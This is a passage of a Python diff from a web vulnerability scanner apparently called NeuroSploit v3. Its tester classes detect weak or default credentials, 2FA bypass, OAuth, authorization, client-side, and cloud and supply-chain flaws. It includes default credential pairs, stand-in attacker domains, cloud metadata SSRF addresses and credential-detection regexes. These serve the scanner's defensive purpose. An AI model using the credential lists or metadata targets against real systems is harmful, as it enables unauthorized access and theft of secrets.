        # match almost any payload - consider anchoring to the password field.
        matched_pw = next(
            (wp for wp in sorted(self.weak_passwords, key=len, reverse=True) if wp in payload),
            None,
        )
        if matched_pw is None:
            return False, 0.0, None
        if response_status in [200, 201, 302]:
            # Body content indicating an authenticated session was created.
            success_indicators = [
                r'"(?:access_)?token"\s*:', r'"session"\s*:',
                r"(?:login|registration|signup)\s+successful",
                r'"authenticated"\s*:\s*true', r'"success"\s*:\s*true',
                r"welcome", r"dashboard", r"logged\s*in",
            ]
            for pattern in success_indicators:
                if re.search(pattern, response_body, re.IGNORECASE):
                    return True, 0.85, f"Weak password accepted: '{matched_pw}' allowed for authentication"
            # A redirect into an authenticated area also counts as acceptance.
            location = response_headers.get("Location", "")
            if response_status == 302 and any(x in location.lower() for x in ["dashboard", "home", "profile", "account"]):
                return True, 0.8, f"Weak password accepted: Redirect to authenticated area with '{matched_pw}'"
        return False, 0.0, None
class DefaultCredentialsTester(BaseTester):
    """Tester for default credential acceptance (admin/admin and friends)."""

    def __init__(self):
        super().__init__()
        self.name = "default_credentials"
        # Well-known factory (username, password) pairs.
        self.default_creds = [
            ("admin", "admin"), ("admin", "password"), ("admin", "admin123"),
            ("root", "root"), ("root", "toor"), ("root", "password"),
            ("administrator", "administrator"), ("admin", "1234"),
            ("test", "test"), ("guest", "guest"), ("user", "user"),
            ("admin", "changeme"), ("admin", "default"),
        ]

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check whether a login attempt with default credentials succeeded.

        Fix: removed an unused `body_lower` local that was computed on every call.
        """
        payload_lower = payload.lower()
        # Which default pair (if any) does this payload carry?
        matched_cred = None
        for username, password in self.default_creds:
            if username in payload_lower and password in payload_lower:
                matched_cred = f"{username}/{password}"
                break
        if not matched_cred:
            return False, 0.0, None
        if response_status in [200, 201, 302]:
            # Indicators that a session/token was issued.
            auth_success = [
                r'"(?:access_)?token"\s*:', r'"session"\s*:',
                r"(?:login|auth)\s+successful", r'"success"\s*:\s*true',
                r'"authenticated"\s*:\s*true', r"welcome",
                r"dashboard", r"admin\s*panel",
            ]
            for pattern in auth_success:
                if re.search(pattern, response_body, re.IGNORECASE):
                    return True, 0.9, f"Default credentials accepted: {matched_cred}"
            # A redirect straight into an admin/dashboard area also counts.
            location = response_headers.get("Location", "")
            if response_status == 302 and any(x in location.lower() for x in ["dashboard", "admin", "home", "panel"]):
                return True, 0.85, f"Default credentials accepted: {matched_cred} (redirect to {location})"
        return False, 0.0, None
class TwoFactorBypassTester(BaseTester):
    """Tester for two-factor authentication bypass."""

    def __init__(self):
        super().__init__()
        self.name = "two_factor_bypass"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for authenticated access reached without completing 2FA.

        Fix: removed an unused `body_lower` local that was computed on every call.
        """
        if response_status == 200:
            # Content that only an authenticated user should see.
            auth_area_patterns = [
                r"dashboard", r"my\s*account", r"profile",
                r"settings", r"admin\s*panel", r'"user"\s*:\s*\{',
                r'"email"\s*:\s*"[^"]+"', r'"role"\s*:',
            ]
            # Content of the 2FA challenge page itself; seeing it means no bypass.
            twofa_page_patterns = [
                r"(?:enter|verify)\s+(?:your\s+)?(?:otp|code|token|2fa)",
                r"two.?factor", r"verification\s+code",
                r"authenticator", r"sms\s+code",
            ]
            has_auth_content = any(re.search(p, response_body, re.IGNORECASE) for p in auth_area_patterns)
            is_twofa_page = any(re.search(p, response_body, re.IGNORECASE) for p in twofa_page_patterns)
            if has_auth_content and not is_twofa_page:
                # Only report when the payload was actually probing the 2FA step.
                bypass_indicators = [
                    "2fa", "otp", "mfa", "verify", "code",
                    "step2", "second", "challenge",
                ]
                if any(bi in payload.lower() for bi in bypass_indicators):
                    return True, 0.85, "2FA bypass: Authenticated area accessed without completing 2FA"
                # Direct-navigation bypass signalled by the test harness context.
                if context.get("skip_2fa") or context.get("direct_access"):
                    return True, 0.9, "2FA bypass: Direct navigation to authenticated page bypassed 2FA"
        # A redirect landing in an authenticated area while skipping verification.
        if response_status in [301, 302]:
            location = response_headers.get("Location", "").lower()
            if any(x in location for x in ["dashboard", "home", "account"]):
                if "verify" not in location and "2fa" not in location and "otp" not in location:
                    return True, 0.7, "2FA bypass: Redirect to authenticated area skipping verification"
        return False, 0.0, None
class OauthMisconfigTester(BaseTester):
    """Detects OAuth misconfigurations: open redirects in the flow, tokens
    leaked in URLs, and missing state parameters."""

    def __init__(self):
        super().__init__()
        self.name = "oauth_misconfig"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for OAuth misconfiguration."""
        # 1) Redirect handling within an OAuth flow.
        if response_status in [301, 302, 303, 307]:
            location = response_headers.get("Location", "")
            if "redirect_uri" in payload.lower() or "callback" in payload.lower():
                # Redirecting to a domain we control = open redirect in the flow.
                evil_domains = ["evil.com", "attacker.com", "malicious.com"]
                if any(domain in location for domain in evil_domains):
                    return True, 0.9, f"OAuth misconfig: Open redirect in OAuth flow to {location}"
                # The server echoed our arbitrary redirect_uri back verbatim.
                if payload in location:
                    return True, 0.85, "OAuth misconfig: Arbitrary redirect_uri accepted"
        # 2) Tokens belong in a fragment or POST body, never in a query string.
        if response_status in [200, 302]:
            location = response_headers.get("Location", "")
            if re.search(r'[?&](?:access_token|token|code)=([A-Za-z0-9._-]+)', location):
                return True, 0.8, "OAuth misconfig: Token/code exposed in URL query parameters"
            if re.search(
                r'(?:redirect|callback|return)["\']?\s*[:=]\s*["\']?https?://[^"\'>\s]*[?&]access_token=',
                response_body, re.IGNORECASE
            ):
                return True, 0.75, "OAuth misconfig: Access token in redirect URL"
        # 3) No state parameter anywhere around an authorize URL -> CSRF risk.
        if "state=" not in response_body and "state=" not in response_headers.get("Location", ""):
            if re.search(r"(?:authorize|oauth|auth)\?", response_body, re.IGNORECASE):
                return True, 0.6, "OAuth misconfig: Missing state parameter (CSRF risk)"
        return False, 0.0, None
@@ -128,3 +128,166 @@ class PrivilegeEscalationTester(BaseTester):
return True, 0.7, f"Privilege escalation: Admin functionality '{func}' accessible"
return False, 0.0, None
class BflaTester(BaseTester):
    """Detects Broken Function Level Authorization (admin features reachable
    by non-admin callers)."""

    def __init__(self):
        super().__init__()
        self.name = "bfla"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for BFLA."""
        if response_status == 200:
            # JSON shapes that only admin endpoints should return.
            admin_data_patterns = [
                r'"users"\s*:\s*\[',
                r'"all_users"\s*:',
                r'"admin_settings"\s*:',
                r'"system_config"\s*:',
                r'"audit_log"\s*:',
                r'"role"\s*:\s*"admin"',
                r'"permissions"\s*:\s*\[',
                r'"api_keys"\s*:\s*\[',
            ]
            # Admin-style path fragments the probing request may have targeted.
            admin_url_indicators = [
                "/admin", "/manage", "/users", "/settings",
                "/config", "/system", "/audit", "/logs",
            ]
            for data_pattern in admin_data_patterns:
                if re.search(data_pattern, response_body, re.IGNORECASE):
                    # Only a finding when the request hit an admin-style path.
                    if any(indicator in payload.lower() for indicator in admin_url_indicators):
                        return True, 0.85, "BFLA: Admin data returned for non-admin request"
            # Human-readable admin page content.
            admin_content = [
                "user management", "system configuration", "admin dashboard",
                "manage users", "all accounts", "server status",
                "delete user", "create admin",
            ]
            body_lower = response_body.lower()
            for snippet in admin_content:
                if snippet in body_lower:
                    return True, 0.8, f"BFLA: Admin functionality '{snippet}' accessible to regular user"
        # A known admin endpoint must answer 401/403 to non-admins, never 200.
        if response_status not in [401, 403] and context.get("is_admin_endpoint"):
            if response_status == 200:
                return True, 0.7, "BFLA: Admin endpoint returned 200 instead of 403"
        return False, 0.0, None
class MassAssignmentTester(BaseTester):
    """Detects mass assignment (privileged fields accepted from client input)."""

    def __init__(self):
        super().__init__()
        self.name = "mass_assignment"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Return (vulnerable, confidence, evidence) for mass assignment."""
        if response_status not in [200, 201]:
            return False, 0.0, None
        # Privileged fields reflected back with attacker-chosen values.
        privileged_fields = [
            (r'"(?:is_)?admin"\s*:\s*true', "admin flag"),
            (r'"role"\s*:\s*"admin"', "admin role"),
            (r'"role"\s*:\s*"superuser"', "superuser role"),
            (r'"verified"\s*:\s*true', "verified status"),
            (r'"is_staff"\s*:\s*true', "staff flag"),
            (r'"is_superuser"\s*:\s*true', "superuser flag"),
            (r'"balance"\s*:\s*\d{4,}', "balance modification"),
            (r'"credits"\s*:\s*\d{3,}', "credits modification"),
            (r'"discount"\s*:\s*\d+', "discount field"),
            (r'"price"\s*:\s*0', "price zeroed"),
        ]
        # Only meaningful if the payload actually tried to set such a field.
        mass_assign_indicators = [
            "admin", "role", "is_staff", "is_superuser",
            "verified", "balance", "credits", "price", "discount",
        ]
        if any(indicator in payload.lower() for indicator in mass_assign_indicators):
            for field_pattern, field_name in privileged_fields:
                if re.search(field_pattern, response_body, re.IGNORECASE):
                    return True, 0.85, f"Mass assignment: Privileged field '{field_name}' accepted and reflected"
            # Weak signal: extra parameters changed the response vs. a clean baseline.
            if context.get("baseline_body"):
                baseline = context["baseline_body"]
                if response_body != baseline and len(response_body) > len(baseline):
                    return True, 0.6, "Mass assignment: Response differs from baseline after extra parameters"
        return False, 0.0, None
class ForcedBrowsingTester(BaseTester):
    """Tester for forced browsing (restricted URLs served without authorization)."""

    def __init__(self):
        super().__init__()
        self.name = "forced_browsing"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for direct access to restricted URLs without authorization.

        A restricted resource should answer 401/403 (or redirect to a login
        page), never 200 with content.

        Fix: removed a dead 301/302 branch whose both paths returned the same
        (False, 0.0, None) as the fall-through - redirects, including proper
        redirects to a login page, are simply never flagged.
        """
        if response_status == 200:
            # Sensitive content that should sit behind authorization.
            sensitive_patterns = [
                (r"(?:admin|management)\s+(?:panel|dashboard|console)", "admin panel"),
                (r'"(?:password|secret|api_key|token)"\s*:\s*"[^"]+"', "sensitive data"),
                (r"(?:backup|dump|export)\s+(?:file|data|database)", "backup files"),
                (r"phpinfo\(\)", "PHP info page"),
                (r"(?:configuration|config)\s+(?:file|settings)", "configuration page"),
                (r"(?:internal|private)\s+(?:api|endpoint|documentation)", "internal docs"),
                (r"(?:debug|diagnostic)\s+(?:info|page|console)", "debug page"),
                (r"(?:user|customer)\s+(?:list|database|records)", "user records"),
            ]
            for pattern, desc in sensitive_patterns:
                if re.search(pattern, response_body, re.IGNORECASE):
                    return True, 0.8, f"Forced browsing: Restricted content accessible - {desc}"
            # Known-restricted paths answering 200 with a non-trivial body.
            restricted_paths = [
                "/admin", "/backup", "/config", "/internal",
                "/debug", "/private", "/management", "/phpinfo",
                "/.git", "/.env", "/wp-admin", "/server-status",
            ]
            if any(path in payload.lower() for path in restricted_paths):
                if len(response_body) > 200:
                    return True, 0.7, "Forced browsing: Restricted URL returned content (200 OK)"
        return False, 0.0, None
@@ -148,3 +148,283 @@ class OpenRedirectTester(BaseTester):
return True, 0.7, "Open redirect via JavaScript"
return False, 0.0, None
class DomClobberingTester(BaseTester):
    """Tester for DOM Clobbering vulnerability.

    Flags responses that reflect injected HTML elements whose id/name
    attributes could shadow JavaScript variables or browser globals.
    """
    def __init__(self):
        super().__init__()
        # Identifier the engine uses to reference this tester.
        self.name = "dom_clobbering"
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for HTML injection that could override JS variables via DOM clobbering.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        if response_status == 200:
            # Check if injected HTML with id/name attributes is reflected.
            # The first pattern embeds the escaped attribute name taken from
            # the payload (the part before '=' for key=value payloads).
            clobber_patterns = [
                r'<(?:a|form|img|input|iframe|embed|object)\s+[^>]*(?:id|name)\s*=\s*["\']?(?:' + re.escape(payload.split("=")[0] if "=" in payload else payload) + r')',
                r'<a\s+[^>]*id=["\'][^"\']+["\'][^>]*href=["\']',
                r'<form\s+[^>]*name=["\'][^"\']+["\']',
            ]
            for pattern in clobber_patterns:
                if re.search(pattern, response_body, re.IGNORECASE):
                    return True, 0.8, "DOM Clobbering: Injected HTML with id/name attribute reflected"
            # Elements whose id/name equals a browser global (window,
            # document, location, ...) can clobber that global for scripts
            # running on the page — higher confidence.
            clobber_targets = [
                r'<[^>]+id=["\'](?:location|document|window|self|top|frames|opener|parent)["\']',
                r'<[^>]+name=["\'](?:location|document|window|self|top|frames|opener|parent)["\']',
            ]
            for pattern in clobber_targets:
                if re.search(pattern, response_body, re.IGNORECASE):
                    return True, 0.85, "DOM Clobbering: HTML element with JS global variable name injected"
        return False, 0.0, None
class PostMessageVulnTester(BaseTester):
    """Tester for postMessage vulnerability (missing origin check).

    Looks for message-event listeners that never validate the sender origin,
    and for postMessage calls that broadcast to the wildcard '*' origin.
    """

    def __init__(self):
        super().__init__()
        self.name = "postmessage_vuln"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for addEventListener('message') without origin validation.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        if response_status != 200:
            return False, 0.0, None

        # Locate a window message-event listener in the page source.
        listener = re.search(r'addEventListener\s*\(\s*["\']message["\']', response_body)
        if listener:
            # Inspect the 500 characters following the listener — the handler
            # body should compare the event origin against an allow-list.
            snippet = response_body[listener.start():listener.start() + 500]
            origin_check_patterns = (
                r'\.origin\s*[!=]==?\s*["\']',
                r'event\.origin',
                r'e\.origin',
                r'msg\.origin',
                r'origin\s*===',
            )
            if not any(re.search(p, snippet) for p in origin_check_patterns):
                return True, 0.85, "postMessage vulnerability: Message listener without origin validation"
            # An origin comparison against the empty string is no check at all.
            if re.search(r'\.origin\s*[!=]==?\s*["\']["\']', snippet):
                return True, 0.7, "postMessage vulnerability: Origin check appears to be empty string"

        # postMessage(..., '*') leaks the message to any embedding origin.
        if re.search(r'\.postMessage\s*\([^)]+,\s*["\']\*["\']', response_body):
            return True, 0.75, "postMessage vulnerability: postMessage with wildcard '*' target origin"
        return False, 0.0, None
class WebsocketHijackTester(BaseTester):
    """Tester for WebSocket Cross-Origin Hijacking.

    A WebSocket endpoint that accepts an upgrade from a foreign Origin can be
    hijacked by any page the victim visits (CSWSH).
    """

    def __init__(self):
        super().__init__()
        self.name = "websocket_hijack"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for WebSocket connections accepting cross-origin requests.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        # 101 Switching Protocols: the cross-origin upgrade handshake succeeded.
        if response_status == 101 and response_headers.get("Upgrade", "").lower() == "websocket":
            return True, 0.8, "WebSocket hijack: Cross-origin WebSocket upgrade accepted"

        if response_status == 200:
            # WebSocket endpoint referenced in the page source.
            endpoint_patterns = (
                r'new\s+WebSocket\s*\(\s*["\']wss?://',
                r'ws://[^"\'>\s]+',
                r'wss://[^"\'>\s]+',
            )
            # No mention of "origin" anywhere, or the caller already observed
            # a cross-origin connection being accepted.
            lacks_origin_validation = (
                "origin" not in response_body.lower()
                or context.get("cross_origin_accepted")
            )
            for pattern in endpoint_patterns:
                if re.search(pattern, response_body) and lacks_origin_validation:
                    return True, 0.7, "WebSocket hijack: WebSocket endpoint found without apparent origin validation"

        # 403 on a WebSocket probe with a wrong origin is the secure outcome.
        return False, 0.0, None
class PrototypePollutionTester(BaseTester):
    """Tester for JavaScript Prototype Pollution.

    Flags responses that accept, reflect, or visibly try to process a
    __proto__ / constructor.prototype payload.
    """

    def __init__(self):
        super().__init__()
        self.name = "prototype_pollution"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for __proto__ pollution indicators.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        if response_status != 200:
            return False, 0.0, None
        # Only meaningful when the request actually attempted pollution.
        # (Removed an unused duplicate indicator list and a redundant
        # re-check of response_status inside this branch.)
        is_proto_payload = any(
            ind in payload for ind in ["__proto__", "constructor", "prototype"]
        )
        if not is_proto_payload:
            return False, 0.0, None
        # Strong signal: the polluted property (or a known pollution effect)
        # is reflected back in the response.
        pollution_effects = [
            r'"__proto__"\s*:\s*\{',
            r'"polluted"\s*:\s*true',
            r'"isAdmin"\s*:\s*true',
            r'"__proto__":\s*\{[^}]*\}',
        ]
        for pattern in pollution_effects:
            if re.search(pattern, response_body, re.IGNORECASE):
                return True, 0.85, "Prototype pollution: __proto__ property accepted and reflected"
        # Medium signal: the server echoed __proto__ instead of stripping it.
        if "__proto__" in response_body:
            return True, 0.7, "Prototype pollution: __proto__ present in server response"
        # Weak signal: an error message shows the server tried to merge the payload.
        if re.search(r"(?:cannot|unable to).*(?:merge|assign|extend).*proto", response_body, re.IGNORECASE):
            return True, 0.6, "Prototype pollution: Server attempted to process __proto__"
        return False, 0.0, None
class CssInjectionTester(BaseTester):
    """Tester for CSS Injection vulnerability.

    Detects the probe payload reflected inside a style context, and known
    dangerous CSS constructs (expression(), javascript: urls, @import, ...).
    """

    def __init__(self):
        super().__init__()
        self.name = "css_injection"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for CSS code rendered in style context.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        if response_status != 200:
            return False, 0.0, None
        # Escape a truncated copy of the *raw* payload. The previous code did
        # re.escape(payload)[:30].replace("\\", "\\\\"): truncating after
        # escaping could split an escape sequence (re.error), and doubling the
        # backslashes made the pattern match a literal backslash instead of
        # the payload, so reflections of special-character payloads were
        # never detected.
        payload_fragment = re.escape(payload[:30])
        css_contexts = [
            # Inside <style> tags
            r'<style[^>]*>(?:[^<]*?)' + payload_fragment,
            # Inside a style attribute
            r'style\s*=\s*["\'][^"\']*' + payload_fragment,
        ]
        for pattern in css_contexts:
            try:
                if re.search(pattern, response_body, re.IGNORECASE | re.DOTALL):
                    return True, 0.85, "CSS injection: Payload reflected in style context"
            except re.error:
                # Defensive: skip any pattern that still fails to compile.
                continue
        # Dangerous CSS constructs reflected anywhere in the response.
        css_attack_patterns = [
            r'expression\s*\(',
            r'url\s*\(\s*["\']?javascript:',
            r'@import\s+["\']?https?://',
            r'background:\s*url\s*\(\s*["\']?https?://[^"\')\s]*attacker',
            r'behavior:\s*url\s*\(',
            r'-moz-binding:\s*url\s*\(',
        ]
        for pattern in css_attack_patterns:
            if re.search(pattern, response_body, re.IGNORECASE):
                return True, 0.8, "CSS injection: Dangerous CSS property reflected"
        return False, 0.0, None
class TabnabbingTester(BaseTester):
    """Tester for Reverse Tabnabbing vulnerability.

    Counts target=_blank anchors that omit rel=noopener/noreferrer, which
    lets the opened page navigate the opener via window.opener.
    """

    def __init__(self):
        super().__init__()
        self.name = "tabnabbing"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for target=_blank links without rel=noopener.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        if response_status != 200:
            return False, 0.0, None
        # Every anchor that opens a new tab...
        anchors = re.finditer(
            r'<a\s+[^>]*target\s*=\s*["\']_blank["\'][^>]*>',
            response_body,
            re.IGNORECASE
        )
        # ...must isolate the opener with rel=noopener or rel=noreferrer.
        protection_re = re.compile(
            r'rel\s*=\s*["\'][^"\']*(?:noopener|noreferrer)[^"\']*["\']',
            re.IGNORECASE
        )
        unprotected = sum(
            1 for anchor in anchors if not protection_re.search(anchor.group(0))
        )
        if unprotected > 0:
            # Confidence grows with the number of exposed links, capped at 0.8.
            confidence = min(0.5 + unprotected * 0.1, 0.8)
            return True, confidence, f"Tabnabbing: {unprotected} target=_blank link(s) without rel=noopener/noreferrer"
        return False, 0.0, None
@@ -0,0 +1,405 @@
"""
NeuroSploit v3 - Cloud & Supply Chain Vulnerability Testers
Testers for S3 misconfiguration, cloud metadata, subdomain takeover,
vulnerable dependencies, container escape, and serverless misconfiguration.
"""
import re
from typing import Tuple, Dict, Optional
from backend.core.vuln_engine.testers.base_tester import BaseTester
class S3BucketMisconfigTester(BaseTester):
    """Tester for S3 Bucket Misconfiguration vulnerabilities.

    Recognizes S3 listing XML, missing-bucket errors (takeover candidates),
    public-write acceptance, and leaked bucket policies.
    """

    def __init__(self):
        super().__init__()
        self.name = "s3_bucket_misconfig"

    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for S3 bucket listing or misconfiguration.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        # Full bucket listing (XML root element) is the strongest signal.
        if re.search(r"<ListBucketResult\s", response_body):
            return True, 0.95, "S3 bucket listing enabled - bucket contents exposed"

        # Listing that actually enumerates object keys.
        if "<Contents>" in response_body and "<Key>" in response_body:
            object_keys = re.findall(r"<Key>([^<]+)</Key>", response_body)
            if object_keys:
                return True, 0.95, f"S3 bucket listing: {len(object_keys)} objects exposed (e.g., {object_keys[0][:50]})"

        # A missing bucket behind a live hostname can be claimed by an attacker.
        if "NoSuchBucket" in response_body:
            name_match = re.search(r"<BucketName>([^<]+)</BucketName>", response_body)
            bucket_name = name_match.group(1) if name_match else "unknown"
            return True, 0.8, f"S3 bucket '{bucket_name}' does not exist - potential takeover"

        # AccessDenied still confirms the bucket exists (enumeration).
        if "AccessDenied" in response_body and "s3.amazonaws.com" in response_body:
            return True, 0.5, "S3 bucket exists but access denied - bucket enumerated"

        # A successful upload probe answered by S3 means world-writable.
        if response_status in (200, 204) and context.get("is_upload_test"):
            lowered_headers = {key.lower(): value for key, value in response_headers.items()}
            if "x-amz-request-id" in lowered_headers:
                return True, 0.9, "S3 bucket allows public write access"

        # Bucket policy JSON leaked in the response body.
        if ('"Statement"' in response_body
                and '"Effect"' in response_body
                and '"s3:' in response_body):
            return True, 0.85, "S3 bucket policy exposed"

        return False, 0.0, None
class CloudMetadataExposureTester(BaseTester):
    """Tester for Cloud Metadata Exposure vulnerabilities (SSRF to metadata).

    Detects cloud metadata-service content (AWS/GCP/Azure) leaking into HTTP
    responses — typically the result of a successful SSRF.
    """
    def __init__(self):
        super().__init__()
        self.name = "cloud_metadata_exposure"
        # Provider -> list of (regex, label) fingerprints matched against the
        # response body.
        self.metadata_indicators = {
            # AWS
            "aws": [
                (r"ami-[0-9a-f]{8,17}", "AWS AMI ID"),
                (r"i-[0-9a-f]{8,17}", "AWS Instance ID"),
                (r"arn:aws:[a-z0-9-]+:[a-z0-9-]*:\d{12}:", "AWS ARN"),
                (r"AKIA[0-9A-Z]{16}", "AWS Access Key"),
                (r"169\.254\.169\.254", "AWS metadata endpoint"),
                (r"\"(?:AccessKeyId|SecretAccessKey|Token)\"", "AWS IAM credentials"),
                (r"ec2\.internal", "AWS internal hostname"),
                (r"\"accountId\"\s*:\s*\"\d{12}\"", "AWS Account ID"),
            ],
            # GCP
            "gcp": [
                (r"projects/\d+/", "GCP Project reference"),
                (r"metadata\.google\.internal", "GCP metadata endpoint"),
                (r"\"access_token\"\s*:\s*\"ya29\.", "GCP OAuth token"),
                (r"compute\.googleapis\.com", "GCP Compute API"),
                (r"serviceAccounts/[^/]+/token", "GCP service account token"),
            ],
            # Azure
            "azure": [
                (r"metadata\.azure\.com", "Azure metadata endpoint"),
                (r"(?:subscriptionId|resourceGroupName)\"\s*:\s*\"", "Azure resource info"),
                (r"\.blob\.core\.windows\.net", "Azure Blob Storage"),
                (r"\.vault\.azure\.net", "Azure Key Vault"),
                (r"\"access_token\"\s*:\s*\"eyJ", "Azure JWT token"),
            ],
        }
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for cloud metadata in response.

        Returns (found, confidence, evidence); credentials or tokens raise
        the confidence to 0.95.
        """
        findings = []
        # Collect every provider fingerprint present in the body.
        for provider, patterns in self.metadata_indicators.items():
            for pattern, description in patterns:
                if re.search(pattern, response_body):
                    findings.append(f"{provider.upper()}: {description}")
        if findings:
            # IAM credentials or tokens are critical
            critical = any(k in f for f in findings for k in ["credentials", "Access Key", "token", "Token"])
            confidence = 0.95 if critical else 0.8
            return True, confidence, f"Cloud metadata exposure: {', '.join(findings[:3])}"
        # Check for metadata endpoint access (SSRF to cloud metadata): the
        # payload targeted a metadata host and got a non-trivial 200 back.
        metadata_urls = ["169.254.169.254", "metadata.google.internal",
                        "metadata.azure.com", "100.100.100.200"]
        for url in metadata_urls:
            if url in payload and response_status == 200 and len(response_body) > 50:
                return True, 0.85, f"Cloud metadata accessible via SSRF ({url})"
        return False, 0.0, None
class SubdomainTakeoverTester(BaseTester):
    """Tester for Subdomain Takeover vulnerabilities.

    Matches responses against known "unclaimed resource" error pages from
    hosting providers, and inspects DNS context (CNAME / NXDOMAIN) supplied
    by the caller via the context dict.
    """
    def __init__(self):
        super().__init__()
        self.name = "subdomain_takeover"
        # (regex, label) fingerprints of provider error pages indicating the
        # pointed-to resource is unclaimed and could be registered by an
        # attacker.
        self.takeover_fingerprints = [
            # AWS S3
            (r"NoSuchBucket", "S3 bucket - NoSuchBucket"),
            (r"The specified bucket does not exist", "S3 bucket does not exist"),
            # GitHub Pages
            (r"There isn't a GitHub Pages site here", "GitHub Pages - unclaimed"),
            (r"For root URLs.*GitHub Pages", "GitHub Pages not configured"),
            # Heroku
            (r"No such app", "Heroku - app not found"),
            (r"herokucdn\.com/error-pages/no-such-app", "Heroku - no such app"),
            # Shopify
            (r"Sorry, this shop is currently unavailable", "Shopify - shop unavailable"),
            # Tumblr
            (r"There's nothing here\.", "Tumblr - unclaimed"),
            (r"Whatever you were looking for doesn't currently exist", "Tumblr not found"),
            # WordPress.com
            (r"Do you want to register.*wordpress\.com", "WordPress.com - unclaimed"),
            # Azure
            (r"404 Web Site not found", "Azure - web app not found"),
            # Fastly
            (r"Fastly error: unknown domain", "Fastly - unknown domain"),
            # Pantheon
            (r"404 error unknown site", "Pantheon - unknown site"),
            # Zendesk
            (r"Help Center Closed", "Zendesk - closed"),
            # Unbounce
            (r"The requested URL was not found on this server.*unbounce", "Unbounce - not found"),
            # Surge.sh
            (r"project not found", "Surge.sh - not found"),
            # Fly.io
            (r"404.*fly\.io", "Fly.io - not found"),
        ]
    def analyze_response(
        self,
        payload: str,
        response_status: int,
        response_headers: Dict,
        response_body: str,
        context: Dict
    ) -> Tuple[bool, float, Optional[str]]:
        """Check for cloud provider error pages indicating takeover opportunity.

        Returns (found, confidence, evidence); (False, 0.0, None) otherwise.
        """
        for pattern, description in self.takeover_fingerprints:
            if re.search(pattern, response_body, re.IGNORECASE):
                return True, 0.9, f"Subdomain takeover: {description}"
        # CNAME pointing to unclaimed resource: the caller resolved DNS and
        # passes the CNAME target in via context.
        if context.get("cname_target"):
            cname = context["cname_target"]
            unclaimed_domains = [
                ".s3.amazonaws.com", ".herokuapp.com", ".github.io",
                ".azurewebsites.net", ".cloudfront.net", ".fastly.net",
                ".ghost.io", ".myshopify.com", ".surge.sh",
            ]
            for domain in unclaimed_domains:
                # NOTE(review): status 0 presumably means "no HTTP response";
                # confirm against the request layer's conventions.
                if cname.endswith(domain) and response_status in [404, 0]:
                    return True, 0.85, f"Subdomain takeover: CNAME to {cname} returns {response_status}"
        # NXDOMAIN with CNAME: the DNS record exists but its target does not.
        if context.get("dns_nxdomain") and context.get("has_cname"):
            return True, 0.8, "Subdomain takeover: CNAME exists but target domain is NXDOMAIN"
        return False, 0.0, None
class VulnerableDependencyTester(BaseTester):
    """Tester for Vulnerable Dependency detection.

    Scans response bodies and headers for version strings of libraries with
    well-known vulnerabilities. The version ranges are heuristic regexes,
    not authoritative CVE matching.
    """
    def __init__(self):
        super().__init__()
        self.name = "vulnerable_dependency"
        # (regex, label) pairs; each regex approximates a vulnerable version
        # range. NOTE(review): some ranges are incomplete — e.g. the Lodash
        # pattern only matches 4.0–4.16, missing vulnerable 4.17.0–4.17.20;
        # confirm coverage before relying on negatives.
        self.vulnerable_libs = [
            # JavaScript
            (r"jquery[/.-](?:1\.\d+|2\.\d+|3\.[0-4]\.\d+)", "jQuery < 3.5.0 (XSS)"),
            (r"angular[/.-]1\.[0-5]\.\d+", "AngularJS < 1.6 (sandbox escape)"),
            (r"lodash[/.-](?:[0-3]\.\d+|4\.(?:1[0-6]|[0-9])\.\d+)", "Lodash < 4.17.21 (prototype pollution)"),
            (r"bootstrap[/.-](?:[1-3]\.\d+|4\.[0-3]\.\d+)", "Bootstrap < 4.3.1 (XSS)"),
            (r"moment[/.-](?:[01]\.\d+|2\.(?:[0-9]|1[0-8])\.\d+)", "Moment.js < 2.19.3 (ReDoS)"),
            (r"handlebars[/.-](?:[0-3]\.\d+|4\.[0-6]\.\d+)", "Handlebars < 4.7.7 (prototype pollution)"),
            # Python
